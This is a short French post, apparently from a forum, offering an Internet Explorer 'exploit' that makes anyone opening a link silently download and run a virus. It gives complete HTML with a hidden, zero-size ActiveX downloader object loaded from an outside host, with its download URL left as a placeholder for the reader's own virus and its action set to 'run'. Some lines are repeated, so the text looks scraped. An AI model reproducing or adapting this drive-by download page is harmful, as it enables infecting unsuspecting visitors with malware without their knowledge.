Tout d'abord ceci n'est exploitable que sous IE (6-7-8..).
Cet exploit permet de :
- faire télécharger un virus ;
- l'exécuter.
Et tout ça à l'insu de la personne qui s'est rendu sur le lien... bon passons au code :
Il vous faut changer la ligne:
En gros : oubliez Internet Explorer !
Cet exploit permet de :
- faire télécharger un virus ;
- l'exécuter.
Et tout ça à l'insu de la personne qui s'est rendu sur le lien... bon passons au code :
Code:
<html> <script> <body> <Title>THC downloader HTML </Title> <BODY> <OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="http://c6.community....Version=1,0,0,1"> <PARAM NAME="propProgressbackground" VALUE="#bccee8"> <PARAM NAME="propTextbackground" VALUE="#f7f8fc"> <PARAM NAME="propBarColor" VALUE="#df0203"> <PARAM NAME="propTextColor" VALUE="#000000"> <PARAM NAME="propWidth" VALUE="0"> <PARAM NAME="propHeight" VALUE="0"> <PARAM NAME="propDownloadUrl" VALUE="Lien de votre virus"> <PARAM NAME="propPostdownloadAction" VALUE="run"> <PARAM NAME="propInstallCompleteUrl" VALUE=""> <PARAM NAME="propbrowserRedirectUrl" VALUE=""> <PARAM NAME="propVerbose" VALUE="0"> <PARAM NAME="propInterrupt" VALUE="0"> </OBJECT> </script> </body> </html>
Code:
<PARAM NAME="propDownloadUrl" VALUE="Lien du virus">
Commentaire